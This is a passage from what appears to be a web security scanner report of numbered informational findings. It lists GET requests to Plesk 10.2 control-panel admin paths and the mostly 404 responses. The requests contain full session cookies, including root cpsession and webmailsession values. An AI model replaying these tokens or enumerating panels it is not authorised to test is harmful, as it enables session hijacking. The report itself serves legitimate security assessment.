12.247. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/user/list/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /smb/user/list/

Request

GET /smb/user/list/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/admin-home
Cookie: PHPSESSID=b2a41b1ec192804dab9cb46ad8c6714e; locale=en-US; psaContext=customers

Response

HTTP/1.1 200 OK
Expires: Sun, 23 Oct 2011 19:00:39 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 23 Sep 2011 19:00:40 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Fri, 23 Sep 2011 19:00:40 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.248. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/statistics/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /statistics/

Request

GET /statistics/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/admin-home
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; psaContext=personal-info; PHPSESSID=d8ba52f4ed7d0d502435be2945503b28; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 12:14:22 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.249. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/subscription/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /subscription/

Request

GET /subscription/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=subscriptions; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 14:16:01 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.250. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/subscription/activate/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /subscription/activate/

Request

GET /subscription/activate/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:24:28 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.251. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/subscription/change  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /subscription/change

Request

GET /subscription/change HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:24:27 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.252. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/subscription/create  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /subscription/create

Request

GET /subscription/create HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:24:27 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.253. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/subscription/delete/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /subscription/delete/

Request

GET /subscription/delete/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:24:28 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.254. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/subscription/list  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /subscription/list

Request

GET /subscription/list HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:24:29 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.255. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/subscription/list-data  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /subscription/list-data

Request

GET /subscription/list-data HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:24:27 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.256. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/subscription/list/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /subscription/list/

Request

GET /subscription/list/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:24:29 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.257. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/subscription/overview/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /subscription/overview/

Request

GET /subscription/overview/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=subscriptions; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 14:16:01 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.258. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/subscription/overview/id/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /subscription/overview/id/

Request

GET /subscription/overview/id/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:24:26 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.259. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/subscription/stats-hint/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /subscription/stats-hint/

Request

GET /subscription/stats-hint/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=subscriptions; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 14:16:01 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.260. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/subscription/stats-hint/domainId/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /subscription/stats-hint/domainId/

Request

GET /subscription/stats-hint/domainId/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:20:23 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.261. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/subscription/suspend/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /subscription/suspend/

Request

GET /subscription/suspend/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:24:27 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.262. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/user/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /user/

Request

GET /user/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=subscriptions; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 14:16:01 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.263. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/user/create/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /user/create/

Request

GET /user/create/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/admin-home
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; psaContext=personal-info; PHPSESSID=d8ba52f4ed7d0d502435be2945503b28; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 12:14:22 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.264. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/user/list/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /user/list/

Request

GET /user/list/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:20:24 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.265. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/usr/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /usr/

Request

GET /usr/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; reseller_report__report_id=2; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=service-plans; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True; backuplocalrepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; reportautolist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 15:43:03 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.266. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/usr/local/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /usr/local/

Request

GET /usr/local/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; reseller_report__report_id=2; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=service-plans; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True; backuplocalrepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; reportautolist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 15:43:03 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.267. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/usr/local/psa/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /usr/local/psa/

Request

GET /usr/local/psa/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
